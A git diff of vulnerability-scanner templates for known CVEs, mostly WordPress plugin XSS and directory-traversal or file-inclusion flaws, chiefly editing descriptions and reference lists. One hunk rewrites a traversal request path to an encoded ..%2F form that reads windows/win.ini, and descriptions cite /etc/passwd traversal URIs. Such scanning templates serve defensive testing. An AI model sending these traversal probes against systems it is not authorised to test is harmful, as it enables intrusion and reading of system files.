- https://wpscan.com/vulnerability/9815
|
||||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14470
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14470
|
||||||
tags: cve,cve2019,wordpress,xss,wp-plugin
|
tags: cve,cve2019,wordpress,xss,wp-plugin
|
||||||
|
|
|
@ -4,8 +4,8 @@ info:
|
||||||
name: My Calendar <= 3.1.9 - Reflected Cross-Site Scripting (XSS)
|
name: My Calendar <= 3.1.9 - Reflected Cross-Site Scripting (XSS)
|
||||||
author: daffainfo,dhiyaneshDk
|
author: daffainfo,dhiyaneshDk
|
||||||
severity: medium
|
severity: medium
|
||||||
description: Triggered via unescaped usage of URL parameters in multiple locations presented in the public view of a site.
|
description: The my-calendar plugin before 3.1.10 for WordPress has XSS. Triggered via unescaped usage of URL parameters in multiple locations presented in the public view of a site.
|
||||||
reference: |
|
reference:
|
||||||
- https://wpscan.com/vulnerability/9267
|
- https://wpscan.com/vulnerability/9267
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-15713
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-15713
|
||||||
tags: cve,cve2019,wordpress,xss,wp-plugin
|
tags: cve,cve2019,wordpress,xss,wp-plugin
|
||||||
|
|
|
@ -4,7 +4,10 @@ info:
|
||||||
name: WordPress Plugin Download Manager 2.9.93 - Reflected Cross-Site Scripting (XSS)
|
name: WordPress Plugin Download Manager 2.9.93 - Reflected Cross-Site Scripting (XSS)
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: medium
|
severity: medium
|
||||||
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15889
|
description: The download-manager plugin before 2.9.94 for WordPress has XSS via the category shortcode feature, as demonstrated by the orderby or search[publish_date] parameter.
|
||||||
|
reference:
|
||||||
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15889
|
||||||
|
- https://www.cybersecurity-help.cz/vdb/SB2019041819
|
||||||
tags: cve,cve2019,wordpress,xss,wp-plugin
|
tags: cve,cve2019,wordpress,xss,wp-plugin
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
|
|
|
@ -5,7 +5,7 @@ info:
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: medium
|
severity: medium
|
||||||
description: In the api-bearer-auth plugin before 20190907 for WordPress, the server parameter is not correctly filtered in the swagger-config.yaml.php file, and it is possible to inject JavaScript code, aka XSS.
|
description: In the api-bearer-auth plugin before 20190907 for WordPress, the server parameter is not correctly filtered in the swagger-config.yaml.php file, and it is possible to inject JavaScript code, aka XSS.
|
||||||
reference: |
|
reference:
|
||||||
- https://plugins.trac.wordpress.org/changeset/2152730
|
- https://plugins.trac.wordpress.org/changeset/2152730
|
||||||
- https://wordpress.org/plugins/api-bearer-auth/#developers
|
- https://wordpress.org/plugins/api-bearer-auth/#developers
|
||||||
tags: cve,cve2019,wordpress,xss,wp-plugin
|
tags: cve,cve2019,wordpress,xss,wp-plugin
|
||||||
|
|
|
@ -5,7 +5,7 @@ info:
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: high
|
severity: high
|
||||||
description: TVT NVMS-1000 devices allow GET /.. Directory Traversal
|
description: TVT NVMS-1000 devices allow GET /.. Directory Traversal
|
||||||
reference: |
|
reference:
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-20085
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-20085
|
||||||
- https://www.exploit-db.com/exploits/48311
|
- https://www.exploit-db.com/exploits/48311
|
||||||
tags: cve,cve2019,iot,lfi
|
tags: cve,cve2019,iot,lfi
|
||||||
|
@ -13,7 +13,7 @@ info:
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/../../../../../../../../../../../Windows/win.ini"
|
- "{{BaseURL}}/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fwin.ini"
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -5,7 +5,7 @@ info:
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: high
|
severity: high
|
||||||
description: The GraceMedia Media Player plugin 1.0 for WordPress allows Local File Inclusion via the cfg parameter.
|
description: The GraceMedia Media Player plugin 1.0 for WordPress allows Local File Inclusion via the cfg parameter.
|
||||||
reference: |
|
reference:
|
||||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9618
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9618
|
||||||
- https://seclists.org/fulldisclosure/2019/Mar/26
|
- https://seclists.org/fulldisclosure/2019/Mar/26
|
||||||
tags: cve,cve2019,wordpress,wp-plugin,lfi
|
tags: cve,cve2019,wordpress,wp-plugin,lfi
|
||||||
|
|
|
@ -5,7 +5,7 @@ info:
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: high
|
severity: high
|
||||||
description: LimeSurvey before 4.1.12+200324 contains a path traversal vulnerability in application/controllers/admin/LimeSurveyFileManager.php.
|
description: LimeSurvey before 4.1.12+200324 contains a path traversal vulnerability in application/controllers/admin/LimeSurveyFileManager.php.
|
||||||
reference: |
|
reference:
|
||||||
- https://www.exploit-db.com/exploits/48297
|
- https://www.exploit-db.com/exploits/48297
|
||||||
- https://www.cvedetails.com/cve/CVE-2020-11455
|
- https://www.cvedetails.com/cve/CVE-2020-11455
|
||||||
tags: cve,cve2020,lfi
|
tags: cve,cve2020,lfi
|
||||||
|
|
|
@ -5,7 +5,7 @@ info:
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: high
|
severity: high
|
||||||
description: An issue was discovered in Car Rental Management System 1.0. An unauthenticated user can perform a file inclusion attack against the /index.php file with a partial filename in the "page" parameter, to cause local file inclusion resulting in code execution.
|
description: An issue was discovered in Car Rental Management System 1.0. An unauthenticated user can perform a file inclusion attack against the /index.php file with a partial filename in the "page" parameter, to cause local file inclusion resulting in code execution.
|
||||||
reference: |
|
reference:
|
||||||
- https://loopspell.medium.com/cve-2020-29227-unauthenticated-local-file-inclusion-7d3bd2c5c6a5
|
- https://loopspell.medium.com/cve-2020-29227-unauthenticated-local-file-inclusion-7d3bd2c5c6a5
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-29227
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-29227
|
||||||
tags: cve,cve2020,lfi
|
tags: cve,cve2020,lfi
|
||||||
|
|
|
@ -4,7 +4,8 @@ info:
|
||||||
name: Wordpress Plugin EventON Calendar 3.0.5 - Reflected Cross-Site Scripting (XSS)
|
name: Wordpress Plugin EventON Calendar 3.0.5 - Reflected Cross-Site Scripting (XSS)
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: medium
|
severity: medium
|
||||||
reference: |
|
description: The EventON plugin through 3.0.5 for WordPress allows addons/?q= XSS via the search field.
|
||||||
|
reference:
|
||||||
- https://github.com/mustgundogdu/Research/tree/main/EventON_PLUGIN_XSS
|
- https://github.com/mustgundogdu/Research/tree/main/EventON_PLUGIN_XSS
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-29395
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-29395
|
||||||
tags: cve,cve2020,wordpress,xss,wp-plugin
|
tags: cve,cve2020,wordpress,xss,wp-plugin
|
||||||
|
|
|
@ -5,7 +5,7 @@ info:
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: high
|
severity: high
|
||||||
description: ACS Advanced Comment System 1.0 is affected by Directory Traversal via an advanced_component_system/index.php?ACS_path=..%2f URI.
|
description: ACS Advanced Comment System 1.0 is affected by Directory Traversal via an advanced_component_system/index.php?ACS_path=..%2f URI.
|
||||||
reference: |
|
reference:
|
||||||
- https://www.exploit-db.com/exploits/49343
|
- https://www.exploit-db.com/exploits/49343
|
||||||
- https://www.cvedetails.com/cve/CVE-2020-35598
|
- https://www.cvedetails.com/cve/CVE-2020-35598
|
||||||
tags: cve,cve2020,lfi
|
tags: cve,cve2020,lfi
|
||||||
|
|
|
@ -5,7 +5,7 @@ info:
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: medium
|
severity: medium
|
||||||
description: MERCUSYS Mercury X18G 1.0.5 devices allow Directory Traversal via ../ in conjunction with a loginLess or login.htm URI (for authentication bypass) to the web server, as demonstrated by the /loginLess/../../etc/passwd URI.
|
description: MERCUSYS Mercury X18G 1.0.5 devices allow Directory Traversal via ../ in conjunction with a loginLess or login.htm URI (for authentication bypass) to the web server, as demonstrated by the /loginLess/../../etc/passwd URI.
|
||||||
reference: |
|
reference:
|
||||||
- https://github.com/BATTZION/MY_REQUEST/blob/master/Mercury%20Router%20Web%20Server%20Directory%20Traversal.md
|
- https://github.com/BATTZION/MY_REQUEST/blob/master/Mercury%20Router%20Web%20Server%20Directory%20Traversal.md
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-23241
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-23241
|
||||||
tags: cve,cve2021,iot,lfi,router
|
tags: cve,cve2021,iot,lfi,router
|
||||||
|
|
|
@ -5,7 +5,7 @@ info:
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: medium
|
severity: medium
|
||||||
description: The Bello - Directory & Listing WordPress theme before 1.6.0 did not properly sanitise and escape its listing_list_view, bt_bb_listing_field_my_lat, bt_bb_listing_field_my_lng, bt_bb_listing_field_distance_value, bt_bb_listing_field_my_lat_default, bt_bb_listing_field_keyword, bt_bb_listing_field_location_autocomplete, bt_bb_listing_field_price_range_from and bt_bb_listing_field_price_range_to parameter in ints listing page, leading to reflected Cross-Site Scripting issues.
|
description: The Bello - Directory & Listing WordPress theme before 1.6.0 did not properly sanitise and escape its listing_list_view, bt_bb_listing_field_my_lat, bt_bb_listing_field_my_lng, bt_bb_listing_field_distance_value, bt_bb_listing_field_my_lat_default, bt_bb_listing_field_keyword, bt_bb_listing_field_location_autocomplete, bt_bb_listing_field_price_range_from and bt_bb_listing_field_price_range_to parameter in ints listing page, leading to reflected Cross-Site Scripting issues.
|
||||||
reference: |
|
reference:
|
||||||
- https://m0ze.ru/vulnerability/%5B2021-03-21%5D-%5BWordPress%5D-%5BCWE-79%5D-Bello-WordPress-Theme-v1.5.9.txt
|
- https://m0ze.ru/vulnerability/%5B2021-03-21%5D-%5BWordPress%5D-%5BCWE-79%5D-Bello-WordPress-Theme-v1.5.9.txt
|
||||||
- https://wpscan.com/vulnerability/6b5b42fd-028a-4405-b027-3266058029bb
|
- https://wpscan.com/vulnerability/6b5b42fd-028a-4405-b027-3266058029bb
|
||||||
tags: cve,cve2021,wordpress,xss,wp-plugin
|
tags: cve,cve2021,wordpress,xss,wp-plugin
|
||||||
|
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue